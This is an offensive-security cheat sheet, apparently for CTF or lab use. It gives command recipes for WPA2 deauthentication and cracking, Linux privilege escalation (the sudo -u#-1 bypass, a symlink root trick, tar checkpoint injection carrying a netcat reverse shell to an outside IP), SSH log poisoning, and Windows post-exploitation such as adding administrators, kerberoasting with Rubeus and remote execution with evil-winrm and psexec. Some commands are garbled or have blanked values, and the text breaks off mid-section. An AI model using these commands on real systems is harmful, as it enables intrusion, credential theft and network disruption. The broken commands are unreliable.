# Wireless
To start with WPA2 Cracking make sure that your network interface is in monitor
````
ifconfig wlan0 down
iwfconfig wlan0 mode managed
ifconfig wlan0 up
````
Then run airmon-ng
```
airmon-ng check kill
airmon-ng start wlan0
```
To sniff different AP (Access Points)
`airodump-ng wlan0`
To start capturing traffic for a specific AP we use channel number `-c` and MAC address `--bssid`
`airodump-ng -c CHANNEL_NUMBER --bssid MAC_ADDRESS wlan0 `
Now in order to capture the 4-way handshake we need to start the above command with a parameter `-w` so that the caputre file can be saved
`airodump-ng -c CHANNEL_NUMBER --bssid MAC_ADDRESS -w FILENAME wlan0`
Keep this running and launch the deauthentication attack on the AP with a specific host , you can do this to death all clients/host on the AP
`aireplay-ng -0 0 -a MAC_ADDRESS -c HOST_NAME wlan0`
When a client connects back to the host this will capture the handshake.To crack the password we need to use aircrack-ng
`aircrack-ng FILENAME.cap -w path/towordlist/`
When the passwords get cracked you can then go back to using `managed mode on your` network interface
`sudo systemctl restart NetworkManager.service`
# Linux
### Stablilize Shell
1. ctrl+z
2. stty raw -echo
3. fg (press enter x2)
4. export TERM=xterm , for using `clear` command
### Spawn bash
* /usr/bin/script -qc /bin/bash 1&>/dev/null
* python -c 'import pty;pty.spawn("/bin/bash")'
* python3 -c 'import pty;pty.spawn("/bin/bash")'
### Vulnerable sudo (ALL,!root)
`sudo -u#-1 whoami`
`sudo -u#-1 `
### Execute as diffent user
`sudo -u `
### FTP
Connect to ftp on the machine
`ftp user `
After successfully logged in you can download all files with
`mget *`
Download files recusively
` wget -r ftp://user:pass@/ `
### SMB Shares
#### SmbClient
* `smbclient -L \\\\\\` accessing a share anonymously
* `smbclient \\\\10.10.209.122\\ -U `accessing a share with an authorized user
#### Smbmap
* `smbmap -u -p -H `
#### Smbget
* `smbget -R smb:///`
### NFS shares
* `showmount -e ` This lists the nfs shares
* `mount -t nfs :/` Mounting that share
### Cronjobs
* cronjobs for specific users are stored in `/var/spool/cron/cronjobs/`
* `crontab -u -e ` Check cronjobs for a specific user
* `crontab -l` cronjob for the current user
* `cat /etc/crontab` system wide cronjobs
### Finding Binaries
* find . - perm /4000 (user id uid)
* find . -perm /2000 (group id guid)
### Finding File capabilites
`getcap -r / 2>/dev/null`
### Finding text in a files
`grep -rnw '/path/to/somewhere/' -e 'pattern'
`
### Changing file attributes
chattr + i filename `making file immutable`
chattr -i filename `making file mutable`
lschattr filename `Checking file attributes`
### Uploading Files
scp file/you/want `user@ip`:/path/to/store
python -m SimpleHTTPServer [port] `By default will listen on 8000`
python3 -m http.server [port] `By default will listen on 8000`
### Downloading Files
`wget http://:port/`
### Netcat to download files from target
`nc -l -p [port] > file` Receive file
`nc -w 3 [ip] [port] < file `Send file
### Cracaking Zip Archive
`fcrackzip -u -D -p `
### Decrypting PGP key
If you have `asc` key which can be used for PGP authentication then
* john key.asc > asc_hash
* john asc_hash --wordlists=path_to_wordlist
#### Having pgp cli
* pgp --import key.asc
* pgp --decrypt file.pgp
#### Having gpg cli
* gpg --import key.asc
* gpg --decrypt file.pgp
### killing a running job in same shell
`jobs`
```
Find it's job number
$ jobs
[1]+ Running sleep 100 &
$ kill %1
[1]+ Terminated sleep 100
```
### SSH Port Forwarding
`ssh -L :localhost:@`
### SSH auth log poisoning
Login as any user to see that it gets logged then try to login with a malicious php code
`ssh ''@192.168.43.2`
Then `http://ip/page?a=whoami;`
### Getting root with ln (symlink)
If we have permissions to run /usr/bin/ln as root we can onw the machine
```
echo 'bash' > root
chmod +x root
sudo /usr/bin/ln -sf /tmp/root /usr/bin/ln
sudo /usr/bin/ln
```
### Tar Exploitation
When ever you see a cronjob running with a command `cd //andre/backup tar -zcf //filetar.gz *` go to that folder from which a backup is being created and running these command in that directory
```
echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```
### Binary Exploits
If there is a certain command running in a binary example `date` so we can create our own binary and add `/bin/bash` to and path so it gets executed
`export PATH=/:$PATH`
### Enumration
* cat /etc/*release
* cat /etc/issue
* uname -a
* lsb_release -a
* Running Linpeas
* ss -tulpn (for ports that are open on the machine)
# Windows
### Adding User
net user "USER_NAME" "PASS" /add
### Changing User's password
net user "USER_NAME" "NEWPASS"
### Adding User to Administrators
net localgroup administrators "USER_NAME" /add
### Changing File Permissions
CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1.R `Read`
2.W `Write`
3.C `Change`
4.F `Full Control`
### Set File bits
attrib +r filename `add read only bit`
attrib -r filename `remove read only bit`
attrib +h filename `add hidden bit `
attrib -h filename `remove hidden bit`
### Show hidden file/folder
dir /a `show all hidden files & folder`
dir /a:d `show only hidden folder`
dir /a:h `show only hidden files`
### Downloading Files
`certutil.exe -urlcache -f http://:/ ouput.exe`
`powershell -c "wget http://:/" -outfile output.exe`
`powershell Invoke-WebRequest -Uri $ip -OutFile $filepath`
## List Drives
`wmic logicaldisk get caption`
## Decrypting PSCredential Object
* $file = Import-Clixml -Path
* $file.GetNetworkCredential().username
* $file.GetNetworkCredential().password
### Evil-winrm
`evil-winrm -i 10.10.213.169 -u -p ''`
### Psexec.py
` python psexec.py DOMAIN/USER:PASS@IP`
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed
`. .\PowerView.ps1` import the PowerView module
##### Using Bloodhound
* Upload `Sharphound.ps1` (https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)
* Then `. .\Sharhound.ps1`
* `Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN-NAME -ZipFileName loot.zip` Domain name can be found by running `Get-ADDomain` and look for result
* This command will give an archive which you will have to simply drag and drop on the bloodhound GUI running on your local machine and then quries for kerberoastable accounts or getting more information
##### Using Rubeus
* Download rubeus `https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe`
* Documentation `https://github.com/GhostPack/Rubeus`
* Transfer rubeus.exe on targeted windows machine and run `.\Rubeus.exe kerberoast /outfile:C:\temp\hash.txt` to get a hash
# Msfvenom
### List All Payloads
msfvenom -l payloads
### List Payload Format
msfvenom --list formats
# Meterpreter
### Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
# Git
### Dumping repository
`./gitdumper.sh `
### Extracting information from repository
`./extractor.sh `
# Web
### 403 By pass
https://github.com/intrudir/403fuzzer
`python3 403fuzzer.py -hc 403 -u http:///page_that_you_want_to_bypass(which is usally a 403 foribben)`
### XSS to RCE
```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: